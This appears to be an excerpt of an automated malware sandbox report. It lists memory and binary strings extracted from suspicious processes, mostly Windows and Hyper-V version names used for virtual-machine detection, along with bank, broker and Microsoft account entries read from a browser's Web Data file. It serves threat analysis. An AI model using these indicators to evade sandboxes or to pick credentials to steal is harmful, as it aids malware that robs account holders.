Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: vmware
Source: Web Data.36.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Web Data.36.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: RegAsm.exe, 00000002.00000002.2599635058.0000000003D47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Web Data.36.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Web Data.36.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Hyper-V (guest)
Source: Web Data.36.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Web Data.36.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000F7C000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.0000000000B1C000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: Web Data.36.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000F7C000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.0000000000B1C000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: Web Data.36.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000F7C000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.0000000000B1C000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: Web Data.36.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: Web Data.36.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: Web Data.36.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Web Data.36.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000152A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@oX
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: Web Data.36.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: Web Data.36.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4711406923.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.000000000142D000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4711406923.000000000142D000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2761334389.000002033A7EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2604866040.000002033A7EB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4737168375.000002033A7A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4737168375.000002033A7EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: Web Data.36.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: firefox.exe, 00000031.00000002.4753403845.0000020344896000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: Web Data.36.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: RegAsm.exe, 00000002.00000002.2596470514.0000000001560000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}2
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: Web Data.36.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: Web Data.36.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Web Data.36.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: Web Data.36.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: Web Data.36.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: Web Data.36.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Web Data.36.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Web Data.36.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: firefox.exe, 00000031.00000003.2761334389.000002033A7FA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000003.2604866040.000002033A7FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW1
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: firefox.exe, 00000031.00000002.4737168375.000002033A7FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: PXBvYMcLF9IUsaGl9axr.exe, PXBvYMcLF9IUsaGl9axr.exe, 0000000F.00000002.2432163030.0000000000E20000.00000040.00000001.01000000.00000009.sdmp, explorhe.exe, 0000002E.00000002.4708216186.00000000009C0000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
